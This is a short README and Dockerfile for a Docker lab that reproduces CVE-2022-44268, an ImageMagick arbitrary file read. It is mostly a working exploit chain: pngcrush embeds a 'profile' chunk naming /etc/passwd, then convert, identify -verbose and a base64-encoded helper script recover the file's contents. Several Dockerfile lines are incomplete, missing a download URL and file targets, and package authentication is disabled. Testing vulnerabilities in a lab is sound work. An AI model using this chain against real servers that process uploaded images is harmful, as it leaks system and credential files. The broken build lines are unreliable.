Based on the PoC CVE-2022-44268 ImageMagick Arbitrary File Read PoC, I created a vulnerability testing environment by using docker.
# get image
docker pull y1nglamore/cve_2022_44268:latest # you can also build from Dockerfile
# run container
docker run --rm -i -t y1nglamore/cve_2022_44268 /bin/bash
After that you will get into the container, by using ./ FILEPATH
imagemagick will read the file
By default ./
will read /etc/passwd
Alternatively, you can manually execute the following command
pngcrush -text a "profile" "/etc/passwd" 1.png
exiv2 -pS pngout.png
convert pngout.png gopro.png
identify -verbose gopro.png
FROM ubuntu:20.04
RUN apt update --allow-insecure-repositories
RUN apt-get install pngcrush -y --allow-unauthenticated
RUN apt-get install imagemagick -y --allow-unauthenticated
RUN apt-get install exiftool exiv2 wget -y --allow-unauthenticated
RUN apt-get install xxd -y --allow-unauthenticated
RUN wget -O 1.png
RUN echo 'IyEvYmluL2Jhc2gKCmlmIFsgLXogIiQxIiBdOyB0aGVuCiAgICBmaWxlPSIvZXRjL3Bhc3N3ZCIKZWxzZQogICAgZmlsZT0iJDEiCmZpCgpwbmdjcnVzaCAtdGV4dCBhICJwcm9maWxlIiAiJGZpbGUiIDEucG5nIApleGl2MiAtcFMgcG5nb3V0LnBuZyAKY29udmVydCBwbmdvdXQucG5nIGdvcHJvLnBuZyAKCmlkZW50aWZ5IC12ZXJib3NlIGdvcHJvLnBuZyB8IGdyZXAgLWUgIl5bMC05YS1mXSokIiB8ICBncmVwIC4gfCB4eGQgLXIgLXAK' | base64 -d >
RUN chmod +x
CMD sleep infinity